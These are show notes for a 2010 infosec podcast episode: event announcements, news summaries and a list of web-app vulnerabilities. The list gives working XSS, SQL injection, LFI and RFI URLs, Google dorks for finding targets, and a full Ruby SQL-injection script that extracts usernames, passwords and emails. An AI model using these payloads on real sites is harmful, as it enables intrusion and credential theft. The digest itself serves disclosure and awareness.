Your daily source of Pwnage, Policy and Politics.

[display_podcast]

Episode 114 – feel the need for mead?

InfoSec Daily Podcast Episode 114 [ 35:28 | 16.24 MB ] Play Now | Play in Popup | Download (11)

ISD Podcast Episode 114 for April 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:
MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th
    • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

  • Atlanta Secureworld Expo  April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
  • ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training [at] gaissa [dot] org.
  • ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

Kentuckiana ISSA:

Friends of the Podcast: Webhosting services:WebSpeedway

Vulnerabilities of Interest:

    1. MKPortal Contact module is subject to Cross Site Scripting (XSS) vulnerability. Example URLs are available: http://www.sample.com/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E
    2. Joomla Component com_jp_jobs is subject to SQL Injection vulnerability. Version 1.2.0 is impacted, though others may be as well. Google Dork "inurl:option=com_jp_jobs".  Example URL is available: http://www.sample.com/index.php?option=com_jp_jobs&view=detail&id=-999999/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users–
    3. Blog System is subject to a Local File Inclusion (LFI) vulnerability. Versions older than 1.5 are impacted, though others may be as well. Google Dorks "inurl:category=home", "inurl:category=comments", "inurl:category=lists", "inurl:category=habillage" and "inurl:category=info".  Example URLs are available: http://www.sample.com/ADMIN/index.php?category=home&action=../../../../../../../../etc/passwd%00 http://www.sample.com/ADMIN/index.php?category=comments&action=../../../../../../../../etc/passwd%00 http://www.sample.com/ADMIN/index.php?category=lists&action=../../../../../../../../etc/passwd%00 http://www.sample.com/ADMIN/index.php?category=habillage&action=../../../../../../../../etc/passwd%00 http://www.sample.com/ADMIN/index.php?category=info&action=../../../../../../../../etc/passwd%00
    4. Vieassociative Openmairie is subject to (RFI/LFI) Multiple File Include vulnerabilities. Version 1.01 beta is impacted, though others may be as well.  Example URLs are available: http://www.sample.com/[path]/gen/obj/association.class.php??path_om=[Shell] http://www.sample.com/[path]/gen/obj/collectivite.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/planning.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/rubrique.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/assurance.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/cotisation.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/profil.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/utilisateur.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/bureau.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/droit.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/aquartier.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/categorie.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/fonction.class.php?path_om=[Shell] http://www.sample.com/[path]/gen/obj/ressource.class.php?path_om=[Shell] http://www.sample.com/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]
    5. 60cycleCMS (DOCUMENT_ROOT) is subject to a Local File Inclusion (LFI) vulnerability. Version 2.5.2 is impacted, though others may be as well. Example URLs are available: http://www.sample.com/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00 http://www.sample.com/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00 http://www.sample.com/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00
    6. Joomla Component Jvehicles is subject to a SQL Injection vulnerability. Versions 1.0 and 2.0 are impacted, though others may be as well. Google Dork "inurl:option=com_jvehicles".  Example URL is available: http://www.sample.com/index.php?option=com_jvehicles&task=agentlisting&aid=31337
    7. Openurgence vaccin is subject to Local and Remote File Inclusion (LFI/RFI) vulnerabilities. Version 1.03 is impacted, though others may be as well. Example URLs are available: http://www.sample.com/gen/obj/collectivite.class.php?path_om=[Shell] http://www.sample.com/gen/obj/injection.class.php?path_om=[Shell] http://www.sample.com/gen/obj/utilisateur.class.php?path_om=[Shell] http://www.sample.com/gen/obj/droit.class.php?path_om=[Shell] http://www.sample.com/gen/obj/laboratoire.class.php?path_om=[Shell] http://www.sample.com/gen/obj/vaccin.class.php?path_om=[Shell] http://www.sample.com/gen/obj/effetsecondaire.class.php?path_om=[Shell] http://www.sample.com/gen/obj/medecin.class.php?path_om=[Shell] http://www.sample.com/gen/obj/individu.class.php?path_om=[Shell] http://www.sample.com/gen/obj/profil.class.php?path_om=[Shell] http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
    8. Police Municipale Open Main Courante is subject to Local and Remote File Inclusion (LFI/RFI) vulnerabilities. Version 1.01beta is impacted, though others may be as well. Example URLs are available: http://www.sample.com/gen/obj/affectation.class.php?path_om[Shell] http://www.sample.com/gen/obj/categorie.class.php?path_om[Shell] http://www.sample.com/gen/obj/maincourante.class.php?path_om[Shell] http://www.sample.com/gen/obj/planning.class.php?path_om[Shell] http://www.sample.com/gen/obj/utilisateur.class.php?path_om[Shell] http://www.sample.com/gen/obj/affectationportable.class.phpp?path_om[Shell] http://www.sample.com/gen/obj/collectivite.class.php?path_om[Shell] http://www.sample.com/gen/obj/mission.class.php?path_om[Shell] http://www.sample.com/gen/obj/portable.class.php?path_om[Shell] http://www.sample.com/gen/obj/vehicule.class.php?path_om[Shell] http://www.sample.com/gen/obj/affectationvehicule.class.php?path_om[Shell] http://www.sample.com/gen/obj/droit.class.php?path_om[Shell] http://www.sample.com/gen/obj/nature.class.php?path_om[Shell] http://www.sample.com/gen/obj/profil.class.php?path_om[Shell] http://www.sample.com/gen/obj/agent.class.php?path_om[Shell] http://www.sample.com/gen/obj/intervention.class.php?path_om[Shell] http://www.sample.com/gen/obj/periode.class.php?path_om[Shell] http://www.sample.com/gen/obj/urgence.class.php?path_om[Shell] http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
    9. joelz bulletin board is subject to a SQL Injection vulnerability. Version older than 0.9.9rc3 are impacted, though others may be as well. Exploit code is available: #!/usr/bin/ruby #4004-security-project.com #Discovered and vulnerability by Easy Laster require 'net/http' print "\nEnter host name (site.com)->" host=gets.chomp print "\nEnter script path (/forum/)->" path=gets.chomp print "\nEnter script path (userid)->" userid=gets.chomp begin dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0×23,0×23,0×23,0×23,0×23,username,0×23,0×23,0×23,0×23,0×23),8+from+user+where+erstellerid="+ userid +"–" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0×23,0×23,0×23,0×23,0×23,passwort,0×23,0×23,0×23,0×23,0×23),8+from+user+where+erstellerid="+ userid +"–" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\npassword -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0×23,0×23,0×23,0×23,0×23,email,0×23,0×23,0×23,0×23,0×23),8+from+user+where+erstellerid="+ userid +"–" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1] print "\n#########################################################" rescue print "\nExploit failed" end

    Stories of Interest:
    News item 1:  http://www.memphisdailynews.com/editorial/Article.aspx?id=49432
    David Kernell, a 22-year-old student at the University of Tennessee, is accused of accessing Sarah Palin’s Yahoo! email account by answering her security question and re-setting her password.  Then posting screenshots of the hacked accounted included Bristol Palin's phone number.  Bristol Palin, the daughter of former Alaska governor Sarah Palin, testified in a Knoxville, Tenn., court Wednesday that the hacking of her mother's personal email account led to her being pestered by anonymous phone calls Kernell was apparently asked what he thought of Bristol Palin and replied, "Not my type."  Convictions on all four felony charges – identity theft, wire fraud, intentionally accessing Palin’s e-mail account without authorization and obstructing an FBI investigation – could send Kernell to prison for up to 50 years.

    News item 2:http://www.zdnet.co.uk/news/security-threats/2010/04/16/security-researchers-demo-cisco-wi-fi-flaws-40088653/
    Two generations of Cisco wireless LAN equipment contain a range of vulnerabilities, researchers have told the Black Hat security conference. Enno Rey and Daniel Mende from German testing firm ERNW demonstrated how to hack into two separate generations of Cisco Wi-Fi kit. They said that the flaws were fairly easy to find and exploit. In a presentation called 'Hacking Cisco Enterprise WLANs' on Wednesday, the researchers demonstrated an attack aimed at Cisco's first generation equipment Cisco Structured Wireless Aware Network (Swan).  The researchers said it was possible to launch denial of service attacks and to sniff encrypted traffic on Swan by exploiting weaknesses in Cisco's Wireless LAN Context Control Protocol (WLCCP). The protocol defines how information is sent between wireless access points.  Swan access points transfer keys between them to facilitate roaming. Rey said that Leap – the authentication protocol used in Cisco's equipment – was weak, meaning that the cryptography used to hide the keys could be broken.

    News item 3: http://vil.nai.com/vil/5958_false.htm
    McAfee identified a new threat that impacts Windows PCs. Researchers worked diligently to address this threat that attacks critical Windows system executables and buries itself deep into a computer's memory.  The McAfee research team created detection and removal to address this threat. The remediation passed our quality testing and was released with the 5958 virus definition file at 2:00 PM GMT+1 (6am Pacific Time) on Wednesday, April 21." Not long after that, reports began to surface that Windows PC's–primarily Windows XP SP3 PC's–were experiencing significant issues, including constant rebooting or the ever-popular BSOD (blue screen of death) system crash. A number of customers experienced a false positive resulting in the ensuing chaos. The 5958 virus definitions apparently detect svchost.exe–a core system file on Windows PC's–as a malware threat. According to the McAfee statement, though, "corporations who kept a feature called "Scan Processes on Enable" in McAfee VirusScan Enterprise disabled, as it is by default, were not affected." McAfee responded by quickly pulling the faulty update from the McAfee servers. An emergency extra.dat file was made available in the McAfee forums to address the issue, but the forums site was so overwhelmed with customer backlash that it was eventually taken offline. A corrected virus definition file–5959–is now available, and McAfee has posted instructions to recover affected systems.

    All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.